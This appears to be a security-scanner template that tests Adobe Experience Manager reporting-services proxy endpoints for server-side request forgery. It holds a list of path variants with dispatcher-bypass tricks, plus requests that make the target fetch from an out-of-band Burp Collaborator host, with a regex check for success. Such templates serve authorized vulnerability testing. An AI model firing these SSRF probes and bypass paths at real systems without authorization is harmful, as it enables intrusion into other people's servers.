id: aem-ssrf-reporting-service
info:
  name: AEM SSRF Reporting Services
  risk: Medium


params:
  - dest: "gcwyd66hvfkgc5ayfappvqbc93fv3k.burpcollaborator.net"
  - root: "{{.BaseURL}}"

variables:
  - paths: |
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.html
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.css
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.ico
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.png
      /libs/cq/contentinsight/content/proxy.reportingservices.json
      /libs/cq/contentinsight/content/proxy.reportingservices.json/a.css
      /libs/cq/contentinsight/content/proxy.reportingservices.json/a.html
      /libs/cq/contentinsight/content/proxy.reportingservices.json/a.ico
      /libs/cq/contentinsight/content/proxy.reportingservices.json/a.png
      /libs/cq/contentinsight/content/proxy.reportingservices.json/a.1.json
      /libs/cq/contentinsight/content/proxy.reportingservices.json;%0aa.css
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.paths}}?url=http://{{.dest}}/api1.omniture.com/a&q={{.Domain}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && RegexSearch("body", "(?m)<html><body>[a-z0-9]+</body></html>")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/content/..;{{.paths}}?url=http://{{.dest}}/api1.omniture.com/a&q={{.Domain}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && RegexSearch("body", "(?m)<html><body>[a-z0-9]+</body></html>")
